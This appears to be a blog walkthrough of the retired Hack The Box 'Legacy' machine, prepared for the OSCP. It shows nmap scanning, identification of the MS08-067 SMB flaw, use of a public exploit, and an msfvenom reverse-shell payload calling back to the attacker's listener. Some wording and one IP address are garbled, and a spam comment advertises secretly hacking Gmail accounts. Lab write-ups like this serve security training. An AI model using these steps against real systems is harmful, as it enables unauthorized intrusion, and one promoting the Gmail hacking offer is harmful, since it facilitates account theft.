OSCP PREPROTİONS – HTB Legacy

Legacy machine is a vulnerable machine with Windows operating system among retired machines. It is expected to obtain user and root flags from this machine.
We perform a network scan with nmap to recognize the target machine.
Classic Scan

Full Port Scan

As a result of port scanning, 135/tcp msrpc Microsoft Windows RPC, 139/tcp netbios-ssn Microsoft Windows netbios-ssn, 445/tcp microsoft-ds Windows XP microsoft-ds ports were found to be open.
Since the Windows xp operating system is used here, we understand that there is a vulnerability, let’s scan it with nmap and see what kind of vulnerability there is in the smb port.
nmap -T5 10.10.10.10.4 -Pn -p 445 –script vuln -vvvv -oN vulnscan.txt
scan for a vulnerability by smb with

Here we understand that there is a smb-vuln-ms08-067 vulnerability, let’s see if there is a poc exploit related to it.

Let’s look at the first gitbuh repo

We came across https://github.com/andyacer/ms08_067, it has a very explanatory area, I will try to use it by following the instructions given,
in order;
1- first downloaded the repo with git cline
git clone https://github.com/andyacer/ms08_067/
2- then impacket vehicles were landed because impack vehicles were needed
git clone –branch impacket_0_9_17 –single-branch https://github.com/CoreSecurity/impacket/
cd impacket
pip install .
3- created shellcode with msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=4747 EXITFUNC=thread -b “\x00\x0a\x0d\x5c\x5f\x5f\x2f\x2e\x40” -f c -a x86 –platform Windows
4- the generated shellcode was written into the python file
5- The port given with nc is listened
6- python file executed
After the exploit code ran, we got the shell.

Here we have lede user and rot flags.

Comments

  1. sklep online

    Hello there! Do you know if they make any plugins
    to help with SEO? I’m trying to get my blog to rank for some targeted keywords but I’m not seeing very
    good gains. If you know of any please share. Appreciate it!

    You can read similar text here: Dobry sklep

  2. Rastrear Teléfono Celular

    Es muy difícil leer los correos electrónicos de otras personas en la computadora sin conocer la contraseña. Pero a pesar de que Gmail tiene alta seguridad, la gente sabe cómo piratear secretamente una cuenta de Gmail. Compartiremos algunos artículos sobre cómo descifrar Gmail, piratear cualquier cuenta de Gmail en secreto sin saber una palabra.

  3. Anh69

    Wow, marvelous weblog layout!

    How long have you ever been running a blog for? you
    made running a blog glance easy. The overall look of your site is excellent,
    as well as the content material! I read similar here prev next and that was wrote by Ellis97.

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir